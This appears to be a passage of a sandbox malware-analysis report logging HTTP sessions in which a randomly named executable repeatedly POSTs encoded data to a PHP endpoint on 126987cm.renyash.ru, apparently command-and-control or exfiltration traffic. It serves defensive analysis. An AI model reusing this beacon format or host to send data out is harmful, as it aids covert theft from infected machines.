                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                112192.168.2.450119172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:48.836599112 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:49.186752081 CET1788OUTData Raw: 54 56 5b 54 53 41 59 51 5d 56 5b 57 54 5a 51 5e 58 55 58 51 5b 56 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TV[TSAYQ]V[WTZQ^XUXQ[VWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X3/Z#1&6 0 ";*7(#68T$:Y=<'1!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:49.280643940 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:49.456233978 CET953INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=40eCkzZJW9XvYC5ezmsuxfOKd3FWWe8OU%2ByZLqiijqTMh4QvpGL%2Fc7WqFLKs166hAG3WRvOdGm%2FCPtOfjNBGUO1RqFxMnie9WOZ1VgiAPPPFUAgsywj9y3w9pHMgZNemeXyS64Ua"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f53bad21a30-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3788&min_rtt=1911&rtt_var=4472&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=86217&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 22 0b 28 26 2f 57 21 22 0b 57 3e 06 01 1c 32 1f 3a 5b 26 20 3d 45 3f 38 2b 5f 3f 3c 27 0d 24 3c 2c 5c 27 5c 32 0f 2b 21 30 58 29 0c 20 5c 05 1b 39 5c 26 39 37 5f 25 15 00 0c 3e 0e 2f 01 23 01 26 1c 2a 33 28 55 34 06 39 5a 25 16 2d 1f 30 3a 03 0d 29 3c 27 1a 2a 1e 28 08 26 17 2a 51 0f 16 3b 0e 29 0e 00 10 3e 5a 33 07 24 31 06 5e 36 26 39 57 32 3b 27 1e 24 29 3d 01 2b 3e 27 1a 21 20 38 0a 26 3f 3d 06 32 3d 34 0a 2c 2a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98"(&/W!"W>2:[& =E?8+_?<'$<,\'\2+!0X) \9\&97_%>/#&*3(U49Z%-0:)<'*(&*Q;)>Z3$1^6&9W2;'$)=+>'! 8&?=2=4,*&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                113192.168.2.450120172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:48.957009077 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:49.311887980 CET1072OUTData Raw: 54 53 5e 52 53 40 59 52 5d 56 5b 57 54 5a 51 5b 58 5d 58 5c 5b 52 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS^RS@YR]V[WTZQ[X]X\[RWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[![02$#T1 .7]3=(!7<B+Q6%/' 6=5>++1!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:49.398617029 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:49.818738937 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCrExkBp3s81%2Ba4XhhaYNOn6%2FJdL86tmrhqoUS570eIYDhZpPKASm4g%2BOxbRd0vkuF3FfgFp6LPJKMkszGRQyVlgRcU7DaKqtmioKMI2TxQjQyYzGmslX89NpaSJHd2p3X%2BJiwYn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f54797e7290-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2598&min_rtt=2028&rtt_var=1901&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=221547&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0
                                                                                                                                Jan 1, 2025 21:48:49.868674994 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eCrExkBp3s81%2Ba4XhhaYNOn6%2FJdL86tmrhqoUS570eIYDhZpPKASm4g%2BOxbRd0vkuF3FfgFp6LPJKMkszGRQyVlgRcU7DaKqtmioKMI2TxQjQyYzGmslX89NpaSJHd2p3X%2BJiwYn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f54797e7290-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2598&min_rtt=2028&rtt_var=1901&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=221547&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                114192.168.2.450121172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:49.943753958 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:50.296350002 CET1072OUTData Raw: 54 51 5b 5e 56 4b 59 55 5d 56 5b 57 54 5d 51 5b 58 57 58 5e 5b 57 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[^VKYU]V[WT]Q[XWX^[WWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^$$#=Z5>]%>+5]+U<!(R3*[(&5C+-+2*!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:50.411025047 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:50.677129030 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:50 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bf0k5j%2BOk6aUNT%2Fwr0gCVtxZYo6h0Pypy0XQ6Tqq87J4OM36FKYUbjJhHNtKSchrjcU7sYgz6MebVNH9ZFP0utd8KH6ekwF8IWnH8dbIbypGWWeSbJggCDvjiwIx9jur8vdy6TiV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f5aba4c728a-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3675&min_rtt=1947&rtt_var=4187&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=92557&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                115192.168.2.450122172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:50.796118975 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:51.168596029 CET1072OUTData Raw: 54 51 5e 54 56 44 59 55 5d 56 5b 57 54 59 51 5a 58 50 58 5f 5b 51 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ^TVDYU]V[WTYQZXPX_[QWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_30#"""X('!?<"$0"\=%9?0[':!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:51.246347904 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:51.510941982 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZbKNV6ArpfGBc2HAC1PqL8eSBclj7P96XXiFsDz1SDoDBf3toBVKvgYKEqhbWJfv%2BA4sLFIdV%2BfZAtG0mNAVZUR4amSqLxOmr0t3eObN%2Fhg5JCmuXTKtP10biCEmzRP9Mnfayn6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f5ffd404246-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3822&min_rtt=1625&rtt_var=5004&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=76029&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                116192.168.2.450123172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:51.996612072 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:52.343014002 CET1064OUTData Raw: 54 57 5e 57 53 41 5c 54 5d 56 5b 57 54 5c 51 5f 58 54 58 50 5b 53 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TW^WSA\T]V[WT\Q_XTXP[SWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["$#4. >;['=(Z"'R?7!%?33-*%@>>72!^&%X*7
                                                                                                                                Jan 1, 2025 21:48:52.449486971 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:52.623080969 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:52 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CSlXos7fUsMgyns0%2Ba%2FI7rV%2BrQmdYk1CEYv1UTeu34WAq4WXf92hTvg0VvsMgnn%2FaDu7RqEsNw6x1TwdVMuTPjCb6hiGkKPgMLrHusGT8CJyBMfYUgmnd1XDJTqFkWu3aKJwsrUi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f67894642d7-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3874&min_rtt=1597&rtt_var=5154&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=73670&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                117192.168.2.450124172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:52.768533945 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:53.124298096 CET1072OUTData Raw: 54 5e 5b 56 56 45 59 5f 5d 56 5b 57 54 5d 51 53 58 57 58 5a 5b 56 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[VVEY_]V[WT]QSXWXZ[VWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!Y'"#2&"X?\354?'45&8S$ 1*%%+8&:!^&%X*#
                                                                                                                                Jan 1, 2025 21:48:53.231422901 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:53.496126890 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5J3vqBbunO52YI67jfI93jUUFa6cPx1klvC0hFjRHCQum4xGlUzF%2F0u9efq35o2Rr8MDID7lfNT10JUq1GlmzkNQxUM25kUy0DbJDoSsGodDBbWVKgNEdT3kw0mf%2FO8O8EmvY3iz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f6c6beec325-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4035&min_rtt=1653&rtt_var=5385&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=70487&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                118192.168.2.450125172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:53.626204014 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:53.986680031 CET1072OUTData Raw: 51 51 5e 50 53 43 59 51 5d 56 5b 57 54 54 51 5e 58 57 58 59 5b 55 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QQ^PSCYQ]V[WTTQ^XWXY[UWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!['!3_#!.!=?^3>,! (4#6<T' :X)@)+72!^&%X*
                                                                                                                                Jan 1, 2025 21:48:54.101146936 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:54.308953047 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:54 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYST3Dp6TmHC6NSoLhJP6Jsa3BDk0oC3mnJRMZ8ywi1Exs%2B4hhkt%2BuFL4t%2BcvAXnH4H89OsgVYkn5UvgLftpMPorF0M3br69L0XBdnvpGar9on10q4fTHbx7mYpVTNroEQ7c6jgI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f71cae90f45-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3248&min_rtt=1664&rtt_var=3793&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=101806&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                119192.168.2.450126172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:54.439826965 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                120192.168.2.450127172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:48:54.473850965 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:54.829555988 CET1788OUTData Raw: 54 54 5b 53 53 40 5c 55 5d 56 5b 57 54 5b 51 53 58 53 58 5f 5b 52 57 43 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT[SS@\U]V[WT[QSXSX_[RWCVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_'349\!<3[4Y5/T+'P6$W0*))+.82*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:54.925796032 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:55.175950050 CET962INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=grCrfVQj48yzI4BT2kXnbIHS2aZT%2BfLuINx9z6fZ67yGukaV7gCtOg3iFQcdh%2BDJVVx3j2t%2FM7EfQ%2BiJZQ1Kd5uoECNvi%2BaP6Qi%2FD1jceYUPKGYL7dH%2F3xwofsMBy4YRnksoBRm1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f76fd60f795-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2985&min_rtt=1661&rtt_var=3271&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=119135&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
